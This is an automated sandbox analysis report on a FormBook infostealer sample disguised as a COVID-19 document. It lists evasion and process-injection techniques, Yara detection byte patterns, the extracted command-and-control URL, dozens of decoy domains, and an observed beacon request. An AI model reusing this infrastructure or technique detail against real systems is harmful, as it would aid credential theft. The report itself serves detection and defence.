Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Analysis Report COVID-19-Related Requirements.exe

Overview

General Information

Sample Name:COVID-19-Related Requirements.exe
Analysis ID:425178
MD5:7efd588df5d918372c111708f02cc3ce
SHA1:de98b083ed7e8b78be25cacf0715d15dd04228f5
SHA256:de0011128191babcbdb339d2ab7f9568e0b12c5ebc00a99c235fea849885b6a1
Tags:COVID-19exeFormbook
Infos:

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
System process connects to network (likely due to code injection or exploit)
Yara detected AntiVM3
Yara detected FormBook
C2 URLs / IPs found in malware configuration
Injects a PE file into a foreign processes
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • COVID-19-Related Requirements.exe (PID: 6852 cmdline: 'C:\Users\user\Desktop\COVID-19-Related Requirements.exe' MD5: 7EFD588DF5D918372C111708F02CC3CE)
    • COVID-19-Related Requirements.exe (PID: 6964 cmdline: {path} MD5: 7EFD588DF5D918372C111708F02CC3CE)
      • explorer.exe (PID: 3440 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • wscript.exe (PID: 4112 cmdline: C:\Windows\SysWOW64\wscript.exe MD5: 7075DD7B9BE8807FCA93ACD86F724884)
          • cmd.exe (PID: 5768 cmdline: /c del 'C:\Users\user\Desktop\COVID-19-Related Requirements.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 1340 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.tiffanysbeautybling.com/cgsp/"], "decoy": ["dzxcsy.com", "communication-digitale.net", "darkspot.pro", "neighborschoicefranchise.com", "mujeresaprendices.com", "ryanita.com", "karmelbali.com", "lengzu.net", "archoneshop.com", "auszeit-online.com", "incredikit.com", "theostermangroup.com", "challengesbringsuccess.com", "thegoddogcure.com", "missshalae.com", "mulherviaje.com", "danieljosephmuldoon.com", "plantitasmke.com", "lyson.info", "boardwalkcafebeaufort.com", "genesisdrumco.com", "bynature4nature.com", "notesfromthelovewars.com", "klimabeyazesyatamiri.xyz", "micatholics4biden.com", "epicdentalacademy.com", "lucrarsemfronteiras.com", "fmgurbanoutlet.com", "tonkuik.fyi", "sfypband.com", "aspeneaterys.com", "obzophigkr.net", "portablesteamsaunas.com", "clubroyals.com", "658194.com", "samuelhere.com", "footfull.info", "riptidetutorials.com", "catanetwork.com", "nocodecrypto.com", "kisukine.com", "tag-less-poets.com", "juxrams.info", "thebrandvoicemagazine.com", "montanablogs.com", "productos-photon.com", "aibetech.com", "wg101.com", "coefficientinsurence.com", "arinasystem.com", "elgrabador.com", "thewanderers.info", "openbracketindia.com", "saya-pai.com", "healthyskepticmd.com", "lumberlandjsc.xyz", "chanelkonferenz.online", "ajretrobg.com", "libittu.com", "oneroofingnearme.com", "pyd.xyz", "aikookuyama1.com", "partners-net.com", "imrichardallan.com"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000F.00000002.481749515.0000000000400000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    0000000F.00000002.481749515.0000000000400000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x1b4f7:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1c4fa:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    0000000F.00000002.481749515.0000000000400000.00000040.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x18419:$sqlite3step: 68 34 1C 7B E1
    • 0x1852c:$sqlite3step: 68 34 1C 7B E1
    • 0x18448:$sqlite3text: 68 38 2A 90 C5
    • 0x1856d:$sqlite3text: 68 38 2A 90 C5
    • 0x1845b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x18583:$sqlite3blob: 68 53 D8 7F 8C
    0000000F.00000002.484219002.0000000001960000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      0000000F.00000002.484219002.0000000001960000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x1b4f7:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1c4fa:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 17 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      15.2.COVID-19-Related Requirements.exe.400000.0.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        15.2.COVID-19-Related Requirements.exe.400000.0.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x1b4f7:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1c4fa:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        15.2.COVID-19-Related Requirements.exe.400000.0.raw.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x18419:$sqlite3step: 68 34 1C 7B E1
        • 0x1852c:$sqlite3step: 68 34 1C 7B E1
        • 0x18448:$sqlite3text: 68 38 2A 90 C5
        • 0x1856d:$sqlite3text: 68 38 2A 90 C5
        • 0x1845b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x18583:$sqlite3blob: 68 53 D8 7F 8C
        15.2.COVID-19-Related Requirements.exe.400000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          15.2.COVID-19-Related Requirements.exe.400000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x8ae8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x8d62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x14885:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x14371:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x14987:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x14aff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x977a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x135ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xa473:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x1a6f7:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1b6fa:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 1 entries

          Sigma Overview

          No Sigma rule has matched

          Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Found malware configurationShow sources
          Source: 0000000F.00000002.481749515.0000000000400000.00000040.00000001.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.tiffanysbeautybling.com/cgsp/"], "decoy": ["dzxcsy.com", "communication-digitale.net", "darkspot.pro", "neighborschoicefranchise.com", "mujeresaprendices.com", "ryanita.com", "karmelbali.com", "lengzu.net", "archoneshop.com", "auszeit-online.com", "incredikit.com", "theostermangroup.com", "challengesbringsuccess.com", "thegoddogcure.com", "missshalae.com", "mulherviaje.com", "danieljosephmuldoon.com", "plantitasmke.com", "lyson.info", "boardwalkcafebeaufort.com", "genesisdrumco.com", "bynature4nature.com", "notesfromthelovewars.com", "klimabeyazesyatamiri.xyz", "micatholics4biden.com", "epicdentalacademy.com", "lucrarsemfronteiras.com", "fmgurbanoutlet.com", "tonkuik.fyi", "sfypband.com", "aspeneaterys.com", "obzophigkr.net", "portablesteamsaunas.com", "clubroyals.com", "658194.com", "samuelhere.com", "footfull.info", "riptidetutorials.com", "catanetwork.com", "nocodecrypto.com", "kisukine.com", "tag-less-poets.com", "juxrams.info", "thebrandvoicemagazine.com", "montanablogs.com", "productos-photon.com", "aibetech.com", "wg101.com", "coefficientinsurence.com", "arinasystem.com", "elgrabador.com", "thewanderers.info", "openbracketindia.com", "saya-pai.com", "healthyskepticmd.com", "lumberlandjsc.xyz", "chanelkonferenz.online", "ajretrobg.com", "libittu.com", "oneroofingnearme.com", "pyd.xyz", "aikookuyama1.com", "partners-net.com", "imrichardallan.com"]}
          Multi AV Scanner detection for submitted fileShow sources
          Source: COVID-19-Related Requirements.exeVirustotal: Detection: 23%Perma Link
          Source: COVID-19-Related Requirements.exeReversingLabs: Detection: 25%
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 0000000F.00000002.481749515.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000F.00000002.484219002.0000000001960000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000F.00000002.484584798.0000000001990000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000013.00000002.597531412.0000000002F80000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000013.00000002.597396184.0000000002F50000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.434950366.0000000004299000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000013.00000002.596048220.0000000000B10000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 15.2.COVID-19-Related Requirements.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 15.2.COVID-19-Related Requirements.exe.400000.0.unpack, type: UNPACKEDPE
          Machine Learning detection for sampleShow sources
          Source: COVID-19-Related Requirements.exeJoe Sandbox ML: detected
          Source: 15.2.COVID-19-Related Requirements.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: COVID-19-Related Requirements.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: COVID-19-Related Requirements.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: wscript.pdbGCTL source: COVID-19-Related Requirements.exe, 0000000F.00000002.485075034.00000000019E0000.00000040.00000001.sdmp
          Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000010.00000000.460588172.0000000007CA0000.00000002.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: COVID-19-Related Requirements.exe, 0000000F.00000002.485261731.0000000001AA0000.00000040.00000001.sdmp, wscript.exe, 00000013.00000002.598596904.0000000004E9F000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: COVID-19-Related Requirements.exe, wscript.exe
          Source: Binary string: wscript.pdb source: COVID-19-Related Requirements.exe, 0000000F.00000002.485075034.00000000019E0000.00000040.00000001.sdmp
          Source: Binary string: wscui.pdb source: explorer.exe, 00000010.00000000.460588172.0000000007CA0000.00000002.00000001.sdmp
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 4x nop then pop edi
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 4x nop then pop edi
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 4x nop then pop edi
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 4x nop then pop edi

          Networking:

          barindex
          C2 URLs / IPs found in malware configurationShow sources
          Source: Malware configuration extractorURLs: www.tiffanysbeautybling.com/cgsp/
          Source: global trafficHTTP traffic detected: GET /cgsp/?zR-4q=wCZjRreTETPxpz3yzi5aMK9lgrBwWrXWegbflPnh9KjaaDHMPgi5SZz4hafy+YGLKOgeKwGRDg==&hB0=D8yhC83P6d34H HTTP/1.1Host: www.portablesteamsaunas.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 52.58.78.16 52.58.78.16
          Source: Joe Sandbox ViewASN Name: AMAZON-02US AMAZON-02US
          Source: global trafficHTTP traffic detected: GET /cgsp/?zR-4q=wCZjRreTETPxpz3yzi5aMK9lgrBwWrXWegbflPnh9KjaaDHMPgi5SZz4hafy+YGLKOgeKwGRDg==&hB0=D8yhC83P6d34H HTTP/1.1Host: www.portablesteamsaunas.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: unknownDNS traffic detected: queries for: www.portablesteamsaunas.com
          Source: COVID-19-Related Requirements.exe, 00000001.00000002.439653802.0000000006280000.00000002.00000001.sdmp, explorer.exe, 00000010.00000000.464256328.000000000B1A0000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
          Source: COVID-19-Related Requirements.exe, 00000001.00000002.439653802.0000000006280000.00000002.00000001.sdmp, explorer.exe, 00000010.00000000.464256328.000000000B1A0000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
          Source: explorer.exe, 00000010.00000000.435521033.000000000095C000.00000004.00000020.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3/J
          Source: COVID-19-Related Requirements.exe, 00000001.00000002.439653802.0000000006280000.00000002.00000001.sdmp, explorer.exe, 00000010.00000000.464256328.000000000B1A0000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
          Source: COVID-19-Related Requirements.exe, 00000001.00000002.439653802.0000000006280000.00000002.00000001.sdmp, explorer.exe, 00000010.00000000.464256328.000000000B1A0000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
          Source: explorer.exe, 00000010.00000000.464256328.000000000B1A0000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
          Source: COVID-19-Related Requirements.exe, 00000001.00000002.439653802.0000000006280000.00000002.00000001.sdmp, explorer.exe, 00000010.00000000.464256328.000000000B1A0000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
          Source: COVID-19-Related Requirements.exe, 00000001.00000002.439653802.0000000006280000.00000002.00000001.sdmp, explorer.exe, 00000010.00000000.464256328.000000000B1A0000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
          Source: COVID-19-Related Requirements.exe, 00000001.00000002.439653802.0000000006280000.00000002.00000001.sdmp, explorer.exe, 00000010.00000000.464256328.000000000B1A0000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
          Source: COVID-19-Related Requirements.exe, 00000001.00000002.439653802.0000000006280000.00000002.00000001.sdmp, explorer.exe, 00000010.00000000.464256328.000000000B1A0000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
          Source: COVID-19-Related Requirements.exe, 00000001.00000002.439653802.0000000006280000.00000002.00000001.sdmp, explorer.exe, 00000010.00000000.464256328.000000000B1A0000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
          Source: COVID-19-Related Requirements.exe, 00000001.00000002.439653802.0000000006280000.00000002.00000001.sdmp, explorer.exe, 00000010.00000000.464256328.000000000B1A0000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
          Source: COVID-19-Related Requirements.exe, 00000001.00000002.432559159.0000000001877000.00000004.00000040.sdmpString found in binary or memory: http://www.fontbureau.comcom
          Source: COVID-19-Related Requirements.exe, 00000001.00000002.432559159.0000000001877000.00000004.00000040.sdmpString found in binary or memory: http://www.fontbureau.commQ
          Source: COVID-19-Related Requirements.exe, 00000001.00000002.439653802.0000000006280000.00000002.00000001.sdmp, explorer.exe, 00000010.00000000.464256328.000000000B1A0000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
          Source: COVID-19-Related Requirements.exe, 00000001.00000002.439653802.0000000006280000.00000002.00000001.sdmp, explorer.exe, 00000010.00000000.464256328.000000000B1A0000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
          Source: COVID-19-Related Requirements.exe, 00000001.00000002.439653802.0000000006280000.00000002.00000001.sdmp, explorer.exe, 00000010.00000000.464256328.000000000B1A0000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
          Source: COVID-19-Related Requirements.exe, 00000001.00000002.439653802.0000000006280000.00000002.00000001.sdmp, explorer.exe, 00000010.00000000.464256328.000000000B1A0000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
          Source: COVID-19-Related Requirements.exe, 00000001.00000002.439653802.0000000006280000.00000002.00000001.sdmp, explorer.exe, 00000010.00000000.464256328.000000000B1A0000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
          Source: COVID-19-Related Requirements.exe, 00000001.00000002.439653802.0000000006280000.00000002.00000001.sdmp, explorer.exe, 00000010.00000000.464256328.000000000B1A0000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
          Source: COVID-19-Related Requirements.exe, 00000001.00000002.439653802.0000000006280000.00000002.00000001.sdmp, explorer.exe, 00000010.00000000.464256328.000000000B1A0000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
          Source: COVID-19-Related Requirements.exe, 00000001.00000002.439653802.0000000006280000.00000002.00000001.sdmp, explorer.exe, 00000010.00000000.464256328.000000000B1A0000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
          Source: wscript.exe, 00000013.00000002.600969129.000000000579F000.00000004.00000001.sdmpString found in binary or memory: http://www.portablesteamsaunas.com
          Source: wscript.exe, 00000013.00000002.600969129.000000000579F000.00000004.00000001.sdmpString found in binary or memory: http://www.portablesteamsaunas.com/
          Source: COVID-19-Related Requirements.exe, 00000001.00000002.439653802.0000000006280000.00000002.00000001.sdmp, explorer.exe, 00000010.00000000.464256328.000000000B1A0000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
          Source: COVID-19-Related Requirements.exe, 00000001.00000002.439653802.0000000006280000.00000002.00000001.sdmp, explorer.exe, 00000010.00000000.464256328.000000000B1A0000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
          Source: COVID-19-Related Requirements.exe, 00000001.00000002.439653802.0000000006280000.00000002.00000001.sdmp, explorer.exe, 00000010.00000000.464256328.000000000B1A0000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
          Source: explorer.exe, 00000010.00000000.464256328.000000000B1A0000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
          Source: COVID-19-Related Requirements.exe, 00000001.00000002.439653802.0000000006280000.00000002.00000001.sdmp, explorer.exe, 00000010.00000000.464256328.000000000B1A0000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
          Source: COVID-19-Related Requirements.exe, 00000001.00000002.439653802.0000000006280000.00000002.00000001.sdmp, explorer.exe, 00000010.00000000.464256328.000000000B1A0000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
          Source: COVID-19-Related Requirements.exe, 00000001.00000002.439653802.0000000006280000.00000002.00000001.sdmp, explorer.exe, 00000010.00000000.464256328.000000000B1A0000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
          Source: COVID-19-Related Requirements.exeString found in binary or memory: https://api.imgur.com/3/image/
          Source: COVID-19-Related Requirements.exeString found in binary or memory: https://api.imgur.com/oauth2/authorize?client_id=
          Source: COVID-19-Related Requirements.exeString found in binary or memory: https://api.imgur.com/oauth2/token

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 0000000F.00000002.481749515.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000F.00000002.484219002.0000000001960000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000F.00000002.484584798.0000000001990000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000013.00000002.597531412.0000000002F80000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000013.00000002.597396184.0000000002F50000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.434950366.0000000004299000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000013.00000002.596048220.0000000000B10000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 15.2.COVID-19-Related Requirements.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 15.2.COVID-19-Related Requirements.exe.400000.0.unpack, type: UNPACKEDPE

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 0000000F.00000002.481749515.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000F.00000002.481749515.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000F.00000002.484219002.0000000001960000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000F.00000002.484219002.0000000001960000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000F.00000002.484584798.0000000001990000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000F.00000002.484584798.0000000001990000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000013.00000002.597531412.0000000002F80000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000013.00000002.597531412.0000000002F80000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000013.00000002.597396184.0000000002F50000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000013.00000002.597396184.0000000002F50000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.434950366.0000000004299000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.434950366.0000000004299000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000013.00000002.596048220.0000000000B10000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000013.00000002.596048220.0000000000B10000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 15.2.COVID-19-Related Requirements.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 15.2.COVID-19-Related Requirements.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 15.2.COVID-19-Related Requirements.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 15.2.COVID-19-Related Requirements.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_0041A060 NtClose,
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_0041A110 NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_00419F30 NtCreateFile,
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_00419FE0 NtReadFile,
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_00419FDC NtReadFile,
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01B099A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01B09910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01B098F0 NtReadVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01B09860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01B09840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01B09A20 NtResumeThread,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01B09A00 NtProtectVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01B09A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01B095D0 NtClose,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01B09540 NtReadFile,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01B097A0 NtUnmapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01B09780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01B09710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01B096E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01B09660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01B099D0 NtCreateProcessEx,
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01B09950 NtQueueApcThread,
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01B098A0 NtWriteVirtualMemory,
